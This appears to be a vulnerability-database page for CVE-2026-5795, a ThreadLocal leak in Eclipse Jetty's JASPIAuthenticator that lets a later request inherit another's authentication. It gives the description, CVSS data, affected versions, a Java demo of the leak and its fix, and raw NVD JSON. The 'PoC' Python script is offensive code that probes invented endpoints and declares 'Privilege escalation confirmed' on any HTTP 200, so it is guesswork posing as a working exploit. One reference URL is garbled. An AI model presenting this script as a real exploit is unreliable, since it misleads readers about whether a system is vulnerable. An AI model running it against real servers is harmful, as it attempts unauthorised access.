Security Vulnerability Report
CVE-2026-5795 CVSS 7.4 HIGH

Published: 2026-04-08 14:16:33
Last Modified: 2026-04-23 11:54:05

Description

In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variables. Upon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals. A subsequent request using the same thread inherits the ThreadLocal values, leading to broken access control and privilege escalation.
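
The leak pattern the description names, as an added stand-alone Java illustration (not Jetty's code; the class, method and role names are hypothetical). A single-thread executor stands in for a pooled request thread: the leaky handler's early return skips cleanup, while the hardened handler clears the ThreadLocal in `finally`.

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

// Added illustration; NOT Jetty code. All class, method and role names are hypothetical.
public class ThreadLocalLeakDemo {
    // Per-thread state set during the auth check, standing in for the ThreadLocals in the advisory.
    private static final ThreadLocal<String> CURRENT_ROLE = new ThreadLocal<>();

    // Vulnerable shape: the early return skips the cleanup at the end of the method.
    static String handleLeaky(String credentialRole, boolean earlyReturn) {
        if (credentialRole != null) CURRENT_ROLE.set(credentialRole);
        if (earlyReturn) return "early return, role=" + CURRENT_ROLE.get();
        String result = "handled, role=" + CURRENT_ROLE.get();
        CURRENT_ROLE.remove();
        return result;
    }

    // Hardened shape: finally clears the per-thread state on every exit path.
    static String handleSafe(String credentialRole, boolean earlyReturn) {
        try {
            if (credentialRole != null) CURRENT_ROLE.set(credentialRole);
            if (earlyReturn) return "early return, role=" + CURRENT_ROLE.get();
            return "handled, role=" + CURRENT_ROLE.get();
        } finally {
            CURRENT_ROLE.remove();
        }
    }

    public static void main(String[] args) throws Exception {
        // One worker thread models a pooled server thread reused across requests.
        ExecutorService pool = Executors.newSingleThreadExecutor();
        try {
            System.out.println("leaky #1: " + pool.submit(() -> handleLeaky("admin", true)).get());
            // A request with no credentials on the same thread inherits the stale value.
            System.out.println("leaky #2: " + pool.submit(() -> handleLeaky(null, false)).get());
            System.out.println("safe  #1: " + pool.submit(() -> handleSafe("admin", true)).get());
            // The state was cleared in finally, so nothing carries over to this request.
            System.out.println("safe  #2: " + pool.submit(() -> handleSafe(null, false)).get());
        } finally {
            pool.shutdown();
        }
    }
}
```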

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

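cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (9.4.0 through 9.4.58, inclusive) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (10.0.0 through 10.0.26, inclusive) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (11.0.0 through 11.0.26, inclusive) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (12.0.0 up to, but excluding, 12.0.34) - VULNERABLE
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* (12.1.0 up to, but excluding, 12.1.8) - VULNERABLE
Eclipse Jetty (for the specific affected versions, refer to the official security advisory)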

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL
target = "http://vulnerable-jetty-server:8080/app"

# Step 1: Send a request that triggers the JASPIAuthenticator early return logic
# This request might aim to trigger a specific condition that leaves ThreadLocals dirty
print("[+] Step 1: Triggering vulnerability to set ThreadLocal...")
try:
    requests.get(target + "/auth-trigger", timeout=5)
except Exception as e:
    print(f"[!] First request completed (可能触发提前返回): {e}")

# Step 2: Send a subsequent request immediately, hoping to hit the same thread
# This request should inherit the privileges if the exploit is successful
print("[+] Step 2: Sending subsequent request to check privilege escalation...")
response = requests.get(target + "/admin/protected-resource")
if response.status_code == 200:
    print("[+] Success! Privilege escalation confirmed. Access granted to protected resource.")
else:
    print("[-] Failed. Access denied.")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5795", "sourceIdentifier": "[email protected]", "published": "2026-04-08T14:16:32.633", "lastModified": "2026-04-23T11:54:04.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variable.\n\n\nUpon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals.\n\n\nA subsequent request using the same thread inherits the ThreadLocal values, leading to a broken access control and privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-226"}, {"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.58", "matchCriteriaId": "D6BB4322-1158-46D7-8A04-2B4FBC3941A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndIncluding": "10.0.26", "matchCriteriaId": "56F09A5B-49C1-406A-B4F6-D6F2D3FA660E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndIncluding": "11.0.26", "matchCriteriaId": 
"2B1CFB36-11A3-449E-BDDF-7837CE9E1511"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.0.34", "matchCriteriaId": "FDF5EEDA-C7D3-41A7-824F-E8CA0402C3B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.1.0", "versionEndExcluding": "12.1.8", "matchCriteriaId": "4A3BA101-07D6-4DE1-A258-A60679A178FB"}]}]}], "references": [{"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-r7p8-xq5m-436chttps://", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/92", "source": "[email protected]", "tags": ["Broken Link"]}]}}